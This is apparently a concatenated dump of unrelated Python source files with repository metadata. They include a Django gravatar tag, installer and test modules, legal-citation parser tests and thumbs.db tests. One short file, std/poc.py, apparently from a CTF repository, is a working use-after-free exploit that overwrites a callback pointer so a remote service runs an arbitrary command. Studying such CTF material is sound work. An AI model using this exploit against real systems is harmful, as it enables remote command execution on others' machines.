        # NOTE(review): buy()'s first positional parameter is `name`, so
        # isNewGroup is passed as the name here — confirm this is intended.
        strCodes=self.buy(isNewGroup)
        codesArr=strCodes.split(" ")
        codes={}
        codes["circle"]=codesArr[0]
        codes["station"]=codesArr[1]
        codes["group"]=codesArr[2]
        codes["impulse"]=codesArr[3]
        return codes
    def getIni(self):
        # Accumulated ini-file text built by buy()/endIni().
        return self.iniStr
    def getFullTitle(self, i, tmp2):
        # Extract the (i+1)-th title="..." attribute value from *tmp2*,
        # with all whitespace stripped.
        tts=tmp2.split("title=\"")
        tts2=tts[i+1].split("\"")
        t=tts2[0]
        t=re.sub("\s", "", t, 100)
        return t
    # destructor (persists the last group and impulse values back to the file)
    def __del__(self):
        print "Сохраняю последние значения группы и импульса: "+str(self.group)+":"+str(self.impulse)
        f=open(self.last,'w')
        f.write(str(self.group)+":"+str(self.impulse))
        f.close()
|
UTF-8
|
Python
| false | false | 2,011 |
15,547,781,643,379 |
5ced267dc13cfa1f33b55741ad075d0a682203aa
|
c7c62c5de87228e3fe5ffe179bdf23cb336dcf96
|
/django_gravatar/templatetags/gravatar_tags.py
|
1280704d5237c594dcce0918781201bc849411ee
|
[
"MIT"
] |
permissive
|
chronossc/django-gravatar
|
https://github.com/chronossc/django-gravatar
|
a863fbb718c3849e96db96b1f186d845f18eb2bd
|
b179700dc333080e82dbeb76e99c8da9bf5fc4ce
|
refs/heads/master
| 2021-01-18T11:51:29.988469 | 2010-09-22T03:31:11 | 2010-09-22T03:31:11 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import re
import urllib
import hashlib
from django import template
from django.conf import settings
# Loose sanity-check patterns for default-image URLs and email addresses.
URL_RE = re.compile(r'^https?://([-\w\.]+)+(:\d+)?(/([\w/_\.]*(\?\S+)?)?)?',
        re.IGNORECASE)
EMAIL_RE = re.compile(r'^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$',
        re.IGNORECASE)
GRAVATAR_URL_PREFIX = 'http://www.gravatar.com/avatar/'
# Gravatar query parameters: maps our friendly name to (gravatar key,
# default value); values equal to the default are omitted from the URL.
DEFAULT_PARAMS = \
{
    # api_key: (gravatar_key, value),
    'size': ('s', 80),    # value is in [1,512]
    'rating': ('r', 'g'), # 'pg', 'r', or 'x'
    'default': ('d', ''), # 'identicon', 'monsterid', 'wavatar', '404', or escaped URI
}
register = template.Library()
def _build_gravatar_url(email, params):
    """Generate a Gravatar URL.

    email: address to hash; returns '' if it does not look like an email.
    params: dict (or object whose __dict__ is used) of friendly parameter
    names from DEFAULT_PARAMS; invalid values are silently dropped.
    Python 2 code (urllib.urlencode, dict mutation during .items()).
    """
    # step 1: get a hex hash of the email address
    email = email.strip().lower().encode('utf-8')
    if not EMAIL_RE.match(email):
        return ''
    email_hash = hashlib.md5(email).hexdigest()
    # step 2a: build a canonized parameters dictionary
    # Accept an arbitrary object by reading its attribute dict.
    if not type(params).__name__ == 'dict':
        params = params.__dict__
    actual_params = {}
    default_keys = DEFAULT_PARAMS.keys()
    for key, value in params.items():
        if key in default_keys:
            k, default_value = DEFAULT_PARAMS[key]
            # skip parameters whose values are defaults,
            # assume these values are mirroring Gravatar's defaults
            if value != default_value:
                actual_params[k] = value
    # step 2b: validate the canonized parameters dictionary
    # silently drop parameter when the value is not valid
    # NOTE(review): deleting keys while iterating .items() is safe on
    # Python 2 (list snapshot) but would raise on Python 3.
    for key, value in actual_params.items():
        if key == 's':
            if value < 1 or value > 512:
                del actual_params[key]
        elif key == 'r':
            if value.lower() not in ('g', 'pg', 'r', 'x'):
                del actual_params[key]
        # except when the parameter key is 'd': replace with 'identicon'
        elif key == 'd':
            if value.lower() not in ('identicon', 'monsterid', 'wavatar', '404'):
                if not URL_RE.match(value): # if not a valid URI
                    del actual_params[key]
                else: # valid URI, encode it
                    actual_params[key] = value # urlencode will encode it later
    # step 3: encode params
    params_encode = urllib.urlencode(actual_params)
    # step 4: form the gravatar url
    gravatar_url = GRAVATAR_URL_PREFIX + email_hash
    if params_encode:
        gravatar_url += '?' + params_encode
    return gravatar_url
class GravatarURLNode(template.Node):
    """Template node that resolves email/params and renders a Gravatar URL."""
    def __init__(self, email, params):
        # Both are stored unresolved; resolution happens at render time.
        self.email = email
        self.params = params
    def render(self, context):
        try:
            if self.params:
                params = template.Variable(self.params).resolve(context)
            else:
                params = {}
            # try matching an address string literal
            email_literal = self.email.strip().lower()
            if EMAIL_RE.match(email_literal):
                email = email_literal
            # treat as a variable
            else:
                email = template.Variable(self.email).resolve(context)
        except template.VariableDoesNotExist:
            # Missing context variables render as empty rather than erroring.
            return ''
        # now, we generate the gravatar url
        return _build_gravatar_url(email, params)
@register.tag(name="gravatar_url")
def get_gravatar_url(parser, token):
    """For template tag: {% gravatar_url <email> <params> %}

    Where <params> is an object or a dictionary (variable), and <email>
    is a string object (variable) or a string (literal).
    """
    # Accept either two args (email, params) or one arg (email only).
    try:
        tag_name, email, params = token.split_contents()
    except ValueError:
        try:
            tag_name, email = token.split_contents()
            params = None
        except ValueError:
            raise template.TemplateSyntaxError('%r tag requires one or two arguments.' %
                                               token.contents.split()[0])
    # if email is quoted, parse as a literal string
    if email[0] in ('"', "'") or email[-1] in ('"', "'"):
        if email[0] == email[-1]:
            email = email[1:-1]
        else:
            raise template.TemplateSyntaxError(
                    "%r tag's first argument is in unbalanced quotes." % tag_name)
    return GravatarURLNode(email, params)
|
UTF-8
|
Python
| false | false | 2,010 |
11,768,210,400,658 |
b1c2b67e39581cc4a5a2019e15e65a88215f5edd
|
dfe52c8c5ab5d28f3603a526459799fca1e982eb
|
/valid/testing_modules/testcase_55_yum_group_install.py
|
0fe5d42dfc366c7b5ba32a95be3439b17795b882
|
[
"GPL-3.0-only"
] |
non_permissive
|
bcrochet/valid
|
https://github.com/bcrochet/valid
|
aa2f0d366004f8fd2c00e464da5ea318badba5bf
|
7b9de36c7c686b6b6f414468d7324e3f7ac3d6af
|
refs/heads/master
| 2021-01-15T19:50:36.617610 | 2013-05-09T16:06:58 | 2013-05-09T16:06:58 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from valid.valid_testcase import *
class testcase_55_yum_group_install(ValidTestcase):
    """
    Try to install 'Development tools' group with yum
    """
    # Runs in stage1 with the default tag set (framework scheduling metadata).
    stages = ['stage1']
    tags = ['default']
    def test(self, connection, params):
        # 600 s timeout: a full group install can pull many packages.
        self.get_return_value(connection, 'yum -y groupinstall \'Development tools\'', 600)
        return self.log
|
UTF-8
|
Python
| false | false | 2,013 |
3,058,016,737,886 |
d4c6cd49f965202f51d26d2dca02995bb6a4ccb5
|
48471487bd5ddd26cc4647a378cfab8e727f1c40
|
/std/poc.py
|
b5fe3dad9c2b697fc2e840b0eced751109b604ca
|
[] |
no_license
|
Trietptm-on-Security/hitbkul
|
https://github.com/Trietptm-on-Security/hitbkul
|
4f9fe864b9c2c36200de86800dd1f0b21b7dd6ad
|
0dc095e5e92ce58646676d4a011bdf4bfd75d324
|
refs/heads/master
| 2017-10-18T06:54:47.004616 | 2012-10-10T06:45:39 | 2012-10-10T06:45:39 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Exploit proof-of-concept (Python 2): drives a use-after-free in a CTF
# service listening on port 0xb00b to execute an attacker-chosen command.
import socket, sys, struct
if len(sys.argv) != 3:
    print 'Usage: %s <ip> <command>' % sys.argv[0]
    exit(0)
s = socket.create_connection((sys.argv[1], 0xb00b))
# cold breasts -> set global info variable
s.send('( ^ )( ^ )\n')
print s.recv(2048)
# lopsided breasts -> free global info variable
s.send('(o)(O)\n')
print s.recv(2048)
# wonder bra breasts -> allocate and write string (overwriting global info)
s.send('(oYo)\n')
print s.recv(2048)
# Payload: callback pointer 0x804857c followed by the command string,
# padded so the allocation reuses the freed global info chunk.
x = struct.pack('I', 0x804857c) + sys.argv[2]
s.send('%s\x00%s\n' % (x, 'A' * (131 + len(x))))
# pornstar breasts -> execute callback
s.send('($)($)\n')
print s.recv(2048)
|
UTF-8
|
Python
| false | false | 2,012 |
6,648,609,407,770 |
1a17779aace160deaeafe7db33ed490f09ffa6a5
|
40bb2cdf828e574f254df9c47bdd7aaebe099ad7
|
/djcelery_transactions/models.py
|
ac90f7c868ead1232125bf01e12d77ffdfa1c235
|
[
"BSD-2-Clause-Views"
] |
permissive
|
spothero/django-celery-transactions
|
https://github.com/spothero/django-celery-transactions
|
1d2f850b9d6516932fffd58e75fffbc6adf7a40e
|
b83d1737426512fedfe1c50580ec08e524bdc677
|
refs/heads/master
| 2020-12-31T06:46:05.355710 | 2014-03-03T19:22:33 | 2014-03-03T19:22:33 | 17,300,914 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from djcelery_transactions.transaction_signals import monkey_patch
monkey_patch()
|
UTF-8
|
Python
| false | false | 2,014 |
16,664,473,135,555 |
4162041459412affc467fe33a2ba46fe9fd1e408
|
ec662dad6d29c4e7ffc6cbecf9ace75654b9cfee
|
/mixremoteembed.py
|
e4b3715dd61dd37e2ed0c14edb862befc531b932
|
[
"GPL-2.0-only",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-generic-exception",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-other-copyleft"
] |
non_permissive
|
Immudzen/CompoundDoc
|
https://github.com/Immudzen/CompoundDoc
|
73038a5a5a02abd91c62d54e520cd5d7028494f0
|
639aa7b65923aaae3e8d7d656c7df3e0f3f7b7e8
|
refs/heads/master
| 2016-09-08T02:01:51.903059 | 2012-03-11T01:47:04 | 2012-03-11T01:47:04 | 1,162,589 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import base
import utility
#For Security control and init
from AccessControl import ClassSecurityInfo
import Globals
class MixRemoteEmbed:
    "Base for all items that embed remote items"
    meta_type = "MixRemoteEmbed"
    security = ClassSecurityInfo()
    # Render modes accepted by embedRemoteObject; anything else renders ''.
    modes = ('view', 'edit', 'config', 'debug')
    security.declarePrivate('embedRemoteObject')
    def embedRemoteObject(self, item, path, mode, view, profile, showid=1):
        "return this item with this subpath mode and view"
        if mode not in self.modes:
            return ''
        # When a profile is given, only embed items whose profile matches.
        if profile:
            if getattr(item,'profile',None) == profile:
                return self.commonEmbedRemoteObject(item,path,mode,view, showid)
        else:
            return self.commonEmbedRemoteObject(item,path,mode,view, showid)
        return ''
    security.declarePrivate('commonEmbedRemoteObject')
    def commonEmbedRemoteObject(self, item, path, mode, view, showid):
        "common part of embedRemoteObject for profile and non profile mode"
        formatid = '<p>%s</p>%s'
        if path:
            # Traverse the subpath (leading '/' stripped) before rendering.
            if path[0] == '/':
                path = path[1:]
            item = item.restrictedTraverse(path)
            if utility.isinstance(item, base.Base):
                if showid:
                    return formatid % (item.getCompoundDoc().getId(), item(mode=mode))
                else:
                    return item(mode=mode)
        elif utility.isinstance(item, base.Base):
            # No subpath: render the item itself with the named view.
            self.setDrawMode(mode)
            string = item.render(name=view, mode=mode)
            if showid:
                return formatid % (item.getId(), string)
            else:
                return string
        return ''
# Register security declarations with Zope (required for ClassSecurityInfo).
Globals.InitializeClass(MixRemoteEmbed)
|
UTF-8
|
Python
| false | false | 2,012 |
15,693,810,538,689 |
19d372a7d3893688bacfc25985edcb116e4f9d2c
|
f1738cd603e0b2e31143f4ebf7eba403402aecd6
|
/ucs/base/univention-installer/installer/modules/35_dl.py.DISABLED
|
f4e19598a031d214be3f0df0ad982b12f869c6b9
|
[] |
no_license
|
m-narayan/smart
|
https://github.com/m-narayan/smart
|
92f42bf90d7d2b24f61915fac8abab70dd8282bc
|
1a6765deafd8679079b64dcc35f91933d37cf2dd
|
refs/heads/master
| 2016-08-05T17:29:30.847382 | 2013-01-04T04:50:26 | 2013-01-04T04:50:26 | 7,079,786 | 8 | 6 | null | false | 2015-04-29T08:54:12 | 2012-12-09T14:56:27 | 2015-02-22T10:34:03 | 2013-01-04T05:09:25 | 222,839 | 1 | 3 | 32 |
Python
| null | null |
#!/usr/bin/python2.6
# -*- coding: utf-8 -*-
#
# Univention Installer
# installer module: default system language
#
# Copyright 2004-2012 Univention GmbH
#
# http://www.univention.de/
#
# All rights reserved.
#
# The source code of this program is made available
# under the terms of the GNU Affero General Public License version 3
# (GNU AGPL V3) as published by the Free Software Foundation.
#
# Binary versions of this program provided by Univention to you as
# well as other copyrighted, protected or trademarked materials like
# Logos, graphics, fonts, specific documentations and configurations,
# cryptographic keys etc. are subject to a license agreement between
# you and Univention and not subject to the GNU AGPL V3.
#
# In the case you use this program under the terms of the GNU AGPL V3,
# the program is provided in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License with the Debian GNU/Linux or Univention distribution in file
# /usr/share/common-licenses/AGPL-3; if not, see
# <http://www.gnu.org/licenses/>.
#
# Results of previous modules are placed in self.all_results (dictionary)
# Results of this module need to be stored in the dictionary self.result (variablename:value[,value1,value2])
#
import objects, string, time
from objects import *
from local import _
class object(content):
    """Installer page that lets the user choose the default system language.

    Renders one radio button per locale chosen on the earlier 'locales'
    page and stores the selection under the profile key 'locale_default'.
    (Python 2 / Univention installer framework code.)
    """

    def checkname(self):
        # Profile keys this module is responsible for.
        return ['locale_default']

    def profile_complete(self):
        """Return True when the installation profile already answers this page."""
        if self.check('locale_default'):
            return False
        if self.all_results.has_key('locale_default'):
            return True
        else:
            if self.ignore('locale_default'):
                return True
        return False

    def run_profiled(self):
        # Unattended mode: pass the preseeded value straight through.
        if self.all_results.has_key('locale_default'):
            return {'locale_default': self.all_results['locale_default']}

    def __create_selection( self ):
        """(Re)build the radio-button list from the available locales.

        The widget is appended as self.elements[3]; index 3 is relied on
        by draw(), incomplete() and result() below.
        """
        default_value=''
        self._locales=self.all_results['locales']
        dict={}  # NOTE: shadows the dict builtin; kept as-is.
        if self.all_results.has_key('locale_default'):
            default_value=self.all_results['locale_default']
        elif hasattr( self, '_locale_default' ):
            # Value remembered from a previous draw() of this page.
            default_value = self._locale_default
        count=0
        default_line=0
        for i in self._locales.split(" "):
            dict[i]=[i, count]
            if i == default_value:
                default_line = count
            count=count+1
        self.elements.append(radiobutton(dict,self.minY,self.minX+2,33,10, [default_line])) #3
        self.elements[3].current=default_line

    def draw( self ):
        # Rebuild the selection on every redraw, preserving the current
        # choice (the locale list may have changed on the previous page).
        if hasattr( self, '_locales' ):
            self._locale_default = self.elements[ 3 ].result()
            del self.elements[ 3 ]
            self.__create_selection()
        content.draw( self )

    def layout(self):
        """Create the static caption and the initial radio-button widget."""
        self.elements.append(textline(_('Select your default system language:'),self.minY-1,self.minX+2)) #2
        self.__create_selection()

    def input(self,key):
        """Handle a key press; ENTER/SPACE on next/back navigates pages."""
        if key in [ 10, 32 ] and self.btn_next():
            return 'next'
        elif key in [ 10, 32 ] and self.btn_back():
            return 'prev'
        else:
            return self.elements[self.current].key_event(key)

    def incomplete(self):
        # Return an error message (truthy) if nothing is selected, else 0.
        if string.join(self.elements[3].result(), ' ').strip(' ') == '':
            return _('Please select the default system language')
        return 0

    def helptext(self):
        return _('Default language \n \n Select a default system language.')

    def modheader(self):
        return _('Default language')

    def result(self):
        """Return the profile values produced by this page."""
        result={}
        result['locale_default']=self.elements[3].result()
        return result
|
UTF-8
|
Python
| false | false | 2,013 |
3,753,801,424,749 |
ecafbfe67764dd2c1ba93f6037ac92a8e84039c3
|
5bda5599b899e247dd8e4180390a898abc7ebb51
|
/scripts/affected_code/tests/ny-tests.py
|
587f15c636b6dd31506435aec0d4c95cee6cf162
|
[
"GPL-3.0-only"
] |
non_permissive
|
JoeGermuska/openstates
|
https://github.com/JoeGermuska/openstates
|
81ad79cf683c8237d7a1f98c1c57d0d3001479b2
|
d1a7b13fe9dfbc91df2bcf52a0256dd9f2aa5621
|
refs/heads/master
| 2021-01-18T10:19:50.766209 | 2013-03-08T23:09:40 | 2013-03-08T23:09:40 | 525,202 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import unittest
import pprint
from ny import Lexer, Parser, ParserState
from utils import parse
class TestRelatedCitation(unittest.TestCase):
    """Smoke test: every sample citation string must parse without error.

    Fix: removed a committed ``import pdb;pdb.set_trace()`` which dropped
    every automated run of this suite into an interactive debugger.
    """

    maxDiff = None

    def test_parse_all(self):
        for string, data in samples:
            # Parsing must at least succeed; exact-output comparison is
            # still disabled (parser output does not yet match `data`).
            _data = parse(Lexer, Parser, ParserState, string)
            # TODO: re-enable once the parser output stabilises:
            # self.assertEqual(data, _data)
samples = [
('Section 32 of the labor law is amended to read as follows:',
{
'type': 'statute',
'id': 'labor law',
'paths': [
[{'type': 'section', 'id': '32'}]
],
'impact': 'amended'
}
),
(('Section 191-b of the labor law, as added by chapter 451 of '
'the laws of 1987, is amended to read as follows:'),
{
'type': 'statute',
'id': 'labor law',
'paths': [
[{'type': 'section', 'id': '191-b'}]
],
'impact': 'amended'
}
),
(('Subdivision 1 of section 100 of the labor law, as amended '
'by chapter 757 of the laws of 1975, is amended to read as follows:'),
{
'type': 'statute',
'id': 'labor law',
'paths': [
[{'type': 'subdivision', 'id': '1'},
{'type': 'section', 'id': '100'}]
],
'impact': 'amended'
}
),
(('Subdivision 1 of section 21 of the labor law, added by section '
'146 of part B of chapter 436 of the laws of 1997 and renumbered by '
'chapter 214 of the laws of 1998, is amended to read as follows:'),
{
'type': 'statute',
'id': 'labor law',
'paths': [
[{'type': 'subdivision', 'id': '1'},
{'type': 'section', 'id': '21'}]
],
'impact': 'amended'
}
),
(('Section 57-0131 of the environmental conservation law, as amended '
'by chapter 286 of the laws of 1998, is amended to read as follows:'),
{
'type': 'statute',
'id': 'environmental conservation law',
'paths': [[{'type': 'section', 'id': '57-0131'}]],
'impact': 'amended'
}
),
(('Subdivision 4 of section 30 of the labor law, as amended by '
'chapter 756 of the laws of 1975 and renumbered by chapter 162 '
'of the laws of 1993, is amended to read as follows:'),
{
'id': 'labor law',
'type': 'statute',
'paths': [
[{'type': 'subdivision', 'id': '4'},
{'type': 'section', 'id': '30'}]
],
'impact': 'amended'
}
),
('Section 30 of the labor law is renumbered section 60.',
{
'id': 'labor law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '30'}]
],
'impact': 'renumbered',
'details': [
[{'type': 'section', 'id': '60'}]
]
}
),
(('Subdivision 1 of section 20 of chapter 784 of the laws of 1951, '
'constituting the New York state defense emergency act, is '
'amended to read as follows:'),
{
'act_name': 'New York state defense emergency act',
'impact': 'amended',
'paths': [
[{'id': '1', 'type': 'subdivision'},
{'id': '20', 'type': 'section'},
{'id': '784', 'type': 'chapter'}]
],
'type': 'session_law',
'year': '1951'}
),
(('Subdivision 1 of section 20 of chapter 784 of the laws of '
'1951, constituting the New York state defense emergency act, '
'as amended by chapter 3 of the laws of 1961, is amended to '
'read as follows:'),
{
'year': '1951',
'type': 'session_law',
'paths': [
[{'type': 'subdivision', 'id': '1'},
{'type': 'section', 'id': '20'},
{'id': '784', 'type': 'chapter'}],
],
'act_name': 'New York state defense emergency act',
'impact': 'amended',
}
),
(('Section 4 of chapter 694 of the laws of 1962, relating to the '
'transfer of judges to the civil court of the city of New York, '
'is amended to read as follows:'),
{
'year': '1962',
'type': 'session_law',
'paths': [
[{'type': 'section', 'id': '4'},
{'type': 'chapter', 'id': '694'}],
],
'impact': 'amended',
}
),
(('Section 4502 of the public health law, as added by a chapter '
'of the laws of 1989, amending the public health law relating '
'to health foods, as proposed in legislative bill number S. '
'3601, is amended to read as follows:'),
{
'id': 'public health law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '4502'}]
],
'impact': 'amended',
}
),
(('Section 4508 of the public health law, as added by a chapter '
'of the laws of 1989, amending the public health law relating '
'to health foods, as proposed in legislative bill number S. 3601, '
'is amended to read as follows:'),
{
'id': 'public health law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '4508'}]
],
'impact': 'amended',
}
),
(('Section 3 of a chapter 234 of the laws of 1989, amending the public '
'health law relating to the sale of health foods, as proposed in '
'legislative bill number A. 5730, is amended to read as follows:'),
{
'year': '1989',
'type': 'session_law',
'paths': [
[{'type': 'section', 'id': '3'},
{'type': 'chapter', 'id': '234'}]
],
'impact': 'amended',
}
),
(('Section 4 of a chapter 234 of the laws of 1989, amended the public '
'health law relating to the sale of health foods, as proposed in '
'legislative bill number A. 5730, is amended to read as follows:'),
{
'year': '1989',
'type': 'session_law',
'paths': [
[{'type': 'section', 'id': '4'},
{'type': 'chapter', 'id': '234'}]
],
'impact': 'amended',
}
),
(('Section 401 of the education law, as amended by a chapter of '
'the laws of 1989, entitled "AN ACT to amend the civil rights '
'law, the education law, the executive law and the general '
'municipal law, in relation to prohibiting discrimination in '
'employment of physically handicapped persons, making certain '
'confirming amendments therein and making an appropriation '
'therefor", is amended to read as follows:'),
{
'id': 'education law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '401'}]
],
'impact': 'amended',
}
),
(('Sections 16-a and 18-a of the general construction law, as added '
'by chapter 917 of the laws of 1920, are amended to read as follows:'),
{
'id': 'general construction law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '16-a'}],
[{'type': 'section', 'id': '18-a'}]
],
'impact': 'amended',
}
),
#
(('Section 631 of the tax law, as amended by chapter 28 of the laws '
'of 1987, subsection (a) as amended by chapter 170 of the laws of '
'1994, subparagraph (c) of paragraph 1 of subsection (b) and '
'paragraph 2 of subsection (b) as amended, subparagraph (D) of '
'paragraph 1 of subsection (b) as added by chapter 586 of the laws '
'of 1999, and paragraph 4 of subsection (b) as amended by chapter '
'760 of the laws of 1992, is amended to read as follows:'),
{
'id': 'tax law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '631'}],
],
'impact': 'amended',
}
),
(('Paragraphs (d) and (f) of section 1513-a of the not-for-profit '
'corporation law, as added by chapter 478 of the laws of 2003, are '
'amended and four new paragraphs (i), (j), (k) and (l) are added to '
'read as follows:'),
{
'id': 'not-for-profit corporation law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '1513-a'},
{'type': 'paragraph', 'id': '(d)'}],
[{'type': 'section', 'id': '1513-a'},
{'type': 'paragraph', 'id': '(f)'}],
],
'impact': 'amended',
'details': [
[{'type': 'section', 'id': '1513-a'},
{'type': 'paragraph', 'id': '(i)'}],
[{'type': 'section', 'id': '1513-a'},
{'type': 'paragraph', 'id': '(j)'}],
[{'type': 'section', 'id': '1513-a'},
{'type': 'paragraph', 'id': '(k)'}],
[{'type': 'section', 'id': '1513-a'},
{'type': 'paragraph', 'id': '(l)'}],
],
}
),
# Aaaaaaand then there are these two monsters. Let's not worry about them...
(('Section 27-1018 of the administrative code of the city of New '
'York, subdivisions c, d and e as added by local law number 61 of '
'the city of New York for the year 1987, is amended to read as '
'follows:'),
{
'id': 'administrative code of the city of New York',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '27-1018'}],
],
'impact': 'amended'
}
),
(('Paragraph 2, subparagraph (A) of paragraph 4, and paragraph 6 of '
'subsection (b) of section 92-85 of the codes and ordinances of the '
'city of Yonkers, paragraph 2 and subparagraph (A) of paragraph 4 '
'as added by local law number 8 and paragraph 6 as amended by local '
'law number 9 of the city of Yonkers for the year 1984, are amended '
'to read as follows:'),
{
'type': 'statute',
'id': 'codes and ordinances of the city of Yonkers',
'paths': [[{'type': 'paragraph', 'id': '2'},
{'type': 'subparagraph', 'id': 'A'},
{'type': 'paragraph', 'id': '4'},
{'type': 'subsection', 'id': 'b'},
{'type': 'section', 'id': '92-85'}],
[{'type': 'paragraph', 'id': '6'},
{'type': 'subsection', 'id': 'b'},
{'type': 'section', 'id': '92-85'}]
],
'impact': 'amended'
}
)
]
if __name__ == '__main__':
unittest.main()
|
UTF-8
|
Python
| false | false | 2,013 |
4,432,406,265,198 |
470ea4d073704b7e0c9c8aecb05391db74fe8e6a
|
e48671fa1593b3a5f8682fc99d684c158c465aae
|
/problem-13/problem-13.py
|
b6db29a563507d85fbb777379400a8e40cd34714
|
[] |
no_license
|
pkakelas/project-euler
|
https://github.com/pkakelas/project-euler
|
294e399cd83412946936cf0416aa9c03eb17a585
|
7b4909f26757bffb8c87d7f3cf9e375cb97b1813
|
refs/heads/master
| 2020-04-04T06:36:29.371744 | 2014-08-19T12:07:04 | 2014-08-19T12:07:04 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def leading_digits_of_sum(numbers, count=10):
    """Return the first `count` digits of sum(numbers) as a string."""
    return str(sum(numbers))[:count]


def main(path='problem-13/problem-13.in'):
    """Project Euler problem 13: print the first ten digits of the sum
    of the integers listed one-per-line in `path`.

    Fixes over the original script: no longer shadows the ``file`` and
    ``sum`` builtins, closes the input file via ``with`` (the original
    leaked the handle), skips blank lines, and prints in a form valid on
    both Python 2 and 3.
    """
    with open(path) as fh:
        numbers = [int(line) for line in fh if line.strip()]
    print(leading_digits_of_sum(numbers))


if __name__ == '__main__':
    main()
|
UTF-8
|
Python
| false | false | 2,014 |
14,070,312,884,537 |
a7cd2370c3e65770213cdccbb9e468e794fae24f
|
ea567534f56d940bd117960d5d8e1f43e2919181
|
/unittests/tests/win/shell/thumbsdb/objects.py
|
5baf6ef5e41904d986693f44eacbbe3efd25c1af
|
[
"LGPL-3.0-only",
"GPL-3.0-only"
] |
non_permissive
|
bytekve/libforensics
|
https://github.com/bytekve/libforensics
|
2208a9987ca52a027d2ff8749ccfe8892031100f
|
629912767c76345e75b3f53b1d42c7a4f03ac09c
|
refs/heads/master
| 2021-01-02T09:15:44.109008 | 2010-04-21T08:33:16 | 2010-04-21T08:33:16 | 32,693,268 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Copyright 2010 Michael Murr
#
# This file is part of LibForensics.
#
# LibForensics is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# LibForensics is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with LibForensics. If not, see <http://www.gnu.org/licenses/>.
"""Unit tests for the lf.win.shell.thumbsdb.objects module."""
# stdlib imports
from unittest import TestCase
from os.path import join
from datetime import datetime
from hashlib import md5
# local imports
from lf.dec import RawIStream, ByteIStream, SEEK_SET
from lf.time import FILETIMETodatetime
from lf.win.ole.cfb import CompoundFile
from lf.win.shell.thumbsdb.objects import (
CatalogEntry, Catalog, Thumbnail, ThumbsDb
)
__docformat__ = "restructuredtext en"
__all__ = [
"CatalogEntryTestCase", "CatalogTestCase", "ThumbnailTestCase",
"ThumbsDbTestCase"
]
class CatalogEntryTestCase(TestCase):
    """Tests for thumbsdb CatalogEntry parsing."""

    def test_from_stream(self):
        """CatalogEntry.from_stream must decode size, id, mtime and name,
        both with and without an explicit stream offset."""
        ae = self.assertEqual

        # Hand-built little-endian catalog entry record.
        data = bytearray()
        data.extend(b"\x3E\x00\x00\x00")  # size
        data.extend(b"\x01\x00\x00\x00")  # id/index
        data.extend(b"\x00\x68\x67\x4F\xB7\xA3\xCA\x01")  # mtime
        data.extend(b"d\x00a\x00n\x00g\x00e\x00r\x00-\x00s\x00i\x00")  # name
        data.extend(b"g\x00n\x00-\x00s\x00h\x00o\x00c\x00k\x00")  # more name
        data.extend(b".\x00j\x00p\x00g\x00\x00\x00")  # more name
        stream = ByteIStream(data)

        # Parse once from the current position and once from offset 0;
        # both must yield the same entry.
        ce0 = CatalogEntry.from_stream(stream)
        ce1 = CatalogEntry.from_stream(stream, 0)

        for ce in (ce0, ce1):
            ae(ce.size, 0x3E)
            ae(ce.id, 1)
            ae(ce.stream_name, "1")
            ae(ce.mtime, datetime(2010, 2, 2, 3, 25, 4))
        # end for
    # end def test_from_stream
# end def CatalogEntryTestCase
class CatalogTestCase(TestCase):
    """Tests for thumbsdb Catalog parsing (header + entry list)."""

    def test_from_stream(self):
        """Catalog.from_stream must decode the header fields and both
        contained catalog entries."""
        ae = self.assertEqual

        data = bytearray()

        # catalog header
        data.extend(b"\x10\x00\x07\x00")  # unknown 1 and 2
        data.extend(b"\x02\x00\x00\x00")  # item_count
        data.extend(b"\x00\x01\x02\x03")  # width
        data.extend(b"\x04\x05\x06\x07")  # height

        # first entry
        data.extend(b"\x2E\x00\x00\x00")  # size
        data.extend(b"\x01\x00\x00\x00")  # id/index
        data.extend(b"\x95\x98\x50\xB7\xA3\xCA\x01")  # mtime
        data.extend(b"z\x00o\x00o\x00l\x00e\x00m\x00u\x00r\x00")  # name
        data.extend(b"1\x00.\x00j\x00p\x00g\x00\x00")  # more name

        # second entry
        data.extend(b"\x3E\x00\x00\x00")  # size
        data.extend(b"\x02\x00\x00\x00")  # id/index
        data.extend(b"\x00\x68\x67\x4F\xB7\xA3\xCA\x01")  # mtime
        data.extend(b"d\x00a\x00n\x00g\x00e\x00r\x00-\x00s\x00i\x00")  # name
        data.extend(b"g\x00n\x00-\x00s\x00h\x00o\x00c\x00k\x00")  # more name
        data.extend(b".\x00j\x00p\x00g\x00\x00\x00")  # more name

        stream = ByteIStream(data)
        cat0 = Catalog.from_stream(stream)
        cat1 = Catalog.from_stream(stream, 0)

        # Expected entries, parsed independently at their known offsets
        # (header is 16 bytes, first entry is 46 bytes long).
        entries = [
            CatalogEntry.from_stream(stream, 16),
            CatalogEntry.from_stream(stream, 62)
        ]

        for cat in (cat0, cat1):
            ae(cat.width, 0x03020100)
